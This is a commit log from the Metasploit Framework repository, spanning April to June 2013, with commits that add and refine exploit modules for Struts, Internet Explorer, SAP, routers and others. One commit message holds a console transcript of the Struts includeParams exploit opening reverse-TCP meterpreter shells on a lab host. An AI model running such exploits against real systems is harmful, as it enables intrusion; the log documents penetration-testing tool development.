sinn3r cb33c5685f Landing #1890 - Oracle WebCenter Content openWebdav() vulnerability 2013-06-02 12:35:40 -05:00
Steve Tornio 61c8861fcf add osvdb ref 2013-06-02 08:33:42 -05:00
sinn3r cc951e3412 Modifies the exploit a little for better stability
This patch makes sure the LFH is enabled before the CGenericElement
object is created.  Triggers is also modified a little.
2013-06-02 03:02:42 -05:00
jvazquez-r7 f68d35f251 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-01 17:09:23 -05:00
jvazquez-r7 1917961904 Land #1888, @swtornio's update for OSVDB references 2013-06-01 16:36:59 -05:00
jvazquez-r7 5939ca8ce4 Add analysis at the end of the module 2013-06-01 15:59:17 -05:00
jvazquez-r7 9be8971bb0 Add module for ZDI-13-094 2013-06-01 15:44:01 -05:00
Steve Tornio 8671ae9de7 add osvdb ref 2013-06-01 14:27:50 -05:00
Steve Tornio 80f1e98952 added osvdb refs 2013-06-01 07:04:43 -05:00
jvazquez-r7 d42ac02e3e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 23:01:05 -05:00
jvazquez-r7 f8e9535c39 Add ZDI reference 2013-05-31 20:50:53 -05:00
jvazquez-r7 3a360caba1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 19:03:21 -05:00
sinn3r 90117c322c Landing #1874 - Post API cleanup 2013-05-31 16:15:23 -05:00
James Lee 4f6d80c813 Land #1804, user-settable filename for psexec 2013-05-31 13:34:52 -05:00
James Lee 5964d36c40 Fix a syntax error
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
2013-05-31 13:31:36 -05:00
jvazquez-r7 48b14c09e3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 01:12:46 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
jvazquez-r7 70037fdbed Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-30 15:02:34 -05:00
jvazquez-r7 d0489b5d1e Delete some commas 2013-05-30 14:25:53 -05:00
jvazquez-r7 6abb591428 Do minor cleanup for lianja_db_net 2013-05-30 14:25:05 -05:00
jvazquez-r7 38e5c2bed2 Land #1877, @zeroSteiner's exploit for Lianja SQL 2013-05-30 14:23:45 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Spencer McIntyre 70e1379338 Use msvcrt in ropdb for stability. 2013-05-30 11:13:22 -04:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console d70526f4cc Renamed as per suggestion 2013-05-30 09:29:26 +01:00
jvazquez-r7 1d0c4151b7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-29 15:29:26 -05:00
Tod Beardsley e7a1f06fbc Modules shouldn't be +x 2013-05-29 15:11:35 -05:00
Console 7c38324b76 Considered using the bourne stager.
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Spencer McIntyre c3ab1ed2a5 Exploit module for Lianja SQL 1.0.0RC5.1 2013-05-29 08:48:41 -04:00
Console ec315ad50d Modified URI handling to make use of target_uri and vars_get/post.
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console b39531cea6 Added references 2013-05-28 23:15:10 +01:00
James Lee f3ff5b5205 Factorize and remove includes
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
jvazquez-r7 66ea59b03f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-28 15:22:46 -05:00
Console 7b43117d87 Added RCE for Struts versions earlier than 2.3.14.2
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
sinn3r d16d316658 Fixes mssql_findandsampledata & ms11_006_creat esizeddibsection
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
sinn3r 73aa14cb91 Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946) 2013-05-28 11:02:21 -05:00
Tod Beardsley 75d6c8079a Spelling, whitespace
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7 e678b2c5d8 Add module for CVE-2012-5946 2013-05-26 00:21:20 -05:00
darknight007 57b7e4ec44 Update ms11_006_createsizeddibsection.rb 2013-05-25 13:14:41 +06:00
jvazquez-r7 d5cf6c1fbc Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-23 12:37:54 -05:00
sinn3r 81ad280107 Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r 67861794f6 Fix automatic payload selection 2013-05-22 22:37:18 -05:00
jvazquez-r7 23bc11c7e0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 15:15:58 -05:00
sinn3r 23fe3146dc Extra print_status I don't want 2013-05-22 14:38:30 -05:00
jvazquez-r7 bfcd86022d Add code cleanup for nginx_chunked_size. 2013-05-22 14:37:42 -05:00
sinn3r 0e6576747a Fix target selection probs, and swf path 2013-05-22 14:34:00 -05:00
jvazquez-r7 0dee5ae94d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 12:54:44 -05:00
LinuxGeek247 81b690ae4b Initial check in of nginx module 2013-05-22 13:52:00 -04:00
sinn3r ecb9d1d7fa Landing #1848 - AdobeCollabSync Buffer Overflow on Adobe Reader X 2013-05-22 12:24:42 -05:00
Joe Vennix aae4768563 Fix whitespace issues from msftidy. 2013-05-21 14:31:36 -05:00
Joe Vennix eaeb10742a Add some comments and clean some things up. 2013-05-21 14:01:14 -05:00
Joe Vennix 978aafcb16 Add DEBUG option, pass args to .encoded_exe(). 2013-05-21 14:01:14 -05:00
Joe Vennix ee8a97419c Add some debug print calls to investigate Auto platform selection. 2013-05-21 14:01:13 -05:00
Joe Vennix 60fdf48535 Use renegerate_payload(cli, ...). 2013-05-21 14:01:13 -05:00
jvazquez-r7 367e789047 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-20 18:49:38 -05:00
jvazquez-r7 53cb493bc9 Fix @jlee-r7's feedback 2013-05-20 18:44:21 -05:00
James Lee f4498c3916 Remove $Id tags
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7 94bc3bf8eb Fix msftidy warning 2013-05-20 10:35:59 -05:00
jvazquez-r7 395aac90c2 Do minor cleanup for linksys_wrt160nv2_apply_exec 2013-05-20 10:34:39 -05:00
jvazquez-r7 08b2c9db1e Land #1801, @m-1-k-3's linksys wrt160n exploit 2013-05-20 10:33:44 -05:00
jvazquez-r7 8235ba6316 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-20 08:48:42 -05:00
m-1-k-3 1a904ccf7d tftp download 2013-05-19 20:37:46 +02:00
jvazquez-r7 dfa19cb46d Do minor cleanup for dlink_dir615_up_exec 2013-05-19 12:43:01 -05:00
jvazquez-r7 348705ad46 Land #1800, @m-1-k-3's exploit for DLINK DIR615 2013-05-19 12:42:02 -05:00
m-1-k-3 f3a2859bed removed user,pass in request 2013-05-19 18:50:12 +02:00
m-1-k-3 aee5b02f65 tftp download check 2013-05-19 18:45:01 +02:00
m-1-k-3 4816925f83 feeback included 2013-05-19 16:19:45 +02:00
jvazquez-r7 85ceaa1a62 Add module for CVE-2013-2730 2013-05-18 12:44:24 -05:00
jvazquez-r7 0f3b13e21d up to date 2013-05-16 15:02:41 -05:00
James Lee 3009bdb57e Add a few more references for those without 2013-05-16 14:32:02 -05:00
h0ng10 ccef6e12d2 changed to array in array 2013-05-16 19:03:47 +02:00
h0ng10 460542506d changed to array 2013-05-16 19:01:20 +02:00
h0ng10 378f0fff5b added missing comma 2013-05-16 18:59:46 +02:00
Joe Vennix 1a5c747bb9 Update description. 2013-05-15 23:52:51 -05:00
Joe Vennix 178a43a772 Whitespace tweaks and minor bug fix. Wrong payloads still run. 2013-05-15 23:47:04 -05:00
Joe Vennix f4b6db8c49 Tweak whitespace. 2013-05-15 23:35:59 -05:00
Joe Vennix a7d79e2a51 Oops, don't cache payload_filename. 2013-05-15 23:34:14 -05:00
Joe Vennix 4d5c4f68cb Initial commit, works on three OSes, but automatic mode fails. 2013-05-15 23:32:02 -05:00
jvazquez-r7 cb24d3ddae Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-15 11:13:29 -05:00
James Lee 61afe1449e Landing #1275, bash cmdstager
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
jvazquez-r7 011b0bb741 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-15 09:07:47 -05:00
jvazquez-r7 649a8829d3 Add modules for Mutiny vulnerabilities 2013-05-15 09:02:25 -05:00
jvazquez-r7 352a7afcd6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 22:29:24 -05:00
sinn3r e1111928c2 Adds patch info for ie_cgenericelement_uaf
This one is MS13-038
2013-05-14 14:55:02 -05:00
jvazquez-r7 500ef5df13 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 14:49:05 -05:00
sinn3r 41e9f35f3f Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform 2013-05-14 14:48:16 -05:00
sinn3r 5e925f6629 Description update 2013-05-14 14:20:27 -05:00
jvazquez-r7 b9caa23b30 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 12:26:23 -05:00
jvazquez-r7 42cfa72f81 Update data after test kloxo 6.1.12 2013-05-13 19:09:06 -05:00
jvazquez-r7 58f2373171 Added module for EDB 25406 2013-05-13 18:08:23 -05:00
Tod Beardsley e3384439ed 64-bit, not '64 bits' 2013-05-13 15:40:17 -05:00
jvazquez-r7 01ce751c51 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-12 17:08:14 -05:00
m-1-k-3 981cc891bc description 2013-05-12 20:07:32 +02:00
jvazquez-r7 ce594a3ba2 Deprecate modules/exploits/windows/http/sap_mgmt_con_osexec_payload 2013-05-12 08:46:40 -05:00
jvazquez-r7 495f1e5013 Add multi platform module for SAP MC exec exploit 2013-05-12 08:46:00 -05:00
sinn3r 7fcf20201b Ranking should be the same (to GoodRanking) 2013-05-11 09:19:25 -05:00
jvazquez-r7 891e36c947 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-09 17:47:35 -05:00
jvazquez-r7 4147a27216 Land #1667, @nmonkee's sap_soap_rfc_sxpg_command_exec exploit 2013-05-09 17:00:11 -05:00
jvazquez-r7 6842432abb Land #1678, @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit 2013-05-09 16:52:01 -05:00
jvazquez-r7 823d89935a Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-09 12:36:43 -05:00
Rob Fuller 95b0d4e5ec move filename init up to remove dup code
as suggested by @jlee-r7
2013-05-09 13:29:21 -04:00
sinn3r 9043eeda66 A slight change for stability
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in #1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable.  I did a few tests, seems better.
2013-05-08 20:02:55 -05:00
jvazquez-r7 866fa167ab Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-08 16:29:52 -05:00
jvazquez-r7 bdd2287daf Land #1809, @wchen-r7's modification for ie_cgenericelement_uaf 2013-05-08 16:21:11 -05:00
sinn3r 9a1400a75b Forgot to remove this print_warning 2013-05-08 15:44:04 -05:00
sinn3r 075f6e8d45 Updates ROP chain and mstime_malloc usage 2013-05-08 15:42:45 -05:00
sinn3r c7609ac7d1 Initial update 2013-05-08 14:24:52 -05:00
jvazquez-r7 1aa80cd35e Add module for CVE-2013-0726 2013-05-08 13:48:48 -05:00
jvazquez-r7 e939de583c Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec 2013-05-07 22:46:39 -05:00
jvazquez-r7 5f59d9f723 Move sap_soap_rfc_sxpg_command_exec to multi dir 2013-05-07 22:46:04 -05:00
jvazquez-r7 ab60e0bfb7 Fix print message 2013-05-07 22:41:15 -05:00
jvazquez-r7 24bad9c15c Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform 2013-05-07 17:03:10 -05:00
jvazquez-r7 76f6d9f130 Move module to multi-platform location 2013-05-07 17:01:56 -05:00
Rob Fuller 71c68d09c1 Allow user ability to set filename for psexec service binary
This should probably be higher up for all
generate_payload_exe but would take a major edit
2013-05-07 15:26:22 -03:00
jvazquez-r7 bcdad23559 up to date 2013-05-06 23:09:32 -05:00
jvazquez-r7 0fa65a6802 Merge branch 'sap_soap_rfc_sxpg_command_exec' of https://github.com/nmonkee/metasploit-framework 2013-05-06 18:50:31 -05:00
m-1-k-3 09bf23f4d6 linksys wrt160n tftp download module 2013-05-06 16:18:15 +02:00
m-1-k-3 22d850533a dir615 down and exec exploit 2013-05-06 15:33:45 +02:00
jvazquez-r7 425a16c511 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-05 22:00:07 -05:00
Tod Beardsley 8239998ada Typo on URL for #1797. Thx @Meatballs1 2013-05-05 12:26:06 -05:00
Tod Beardsley c9ea7e250e Fix disclosure date, ref for #1897 2013-05-05 12:13:02 -05:00
sinn3r a33510e821 Add MS IE8 DoL 0day exploit (CVE-2013-1347)
This module exploits a use-after-free vuln in IE 8, used in the
Department of Labor attack.
2013-05-05 12:04:17 -05:00
jvazquez-r7 2384f34ada Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-03 15:39:16 -05:00
jvazquez-r7 13202a3273 Add OSVDB reference 2013-05-03 09:46:29 -05:00
jvazquez-r7 a95de101e7 Delete extra line 2013-05-02 22:04:27 -05:00
jvazquez-r7 6210b42912 Port EDB 25141 to msf 2013-05-02 22:00:43 -05:00
jvazquez-r7 796f7a39ac Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-02 20:04:48 -05:00
jvazquez-r7 a2e1fbe7a9 Make msftidy happy 2013-05-02 19:46:26 -05:00
sinn3r eb23b5feeb Forgot to remove function ie8_smil. Don't need this anymore. 2013-05-02 14:04:15 -05:00
sinn3r 329e8228d1 Uses js_mstime_malloc to do the no-spray technique 2013-05-02 14:00:15 -05:00
jvazquez-r7 a7e4ba5015 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-30 08:32:24 -05:00
Tod Beardsley 60e0cfb17b Trivial description cleanup 2013-04-29 14:11:20 -05:00
jvazquez-r7 a4632b773a Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-28 12:59:16 -05:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
[Closes #1772]
2013-04-28 12:17:16 -05:00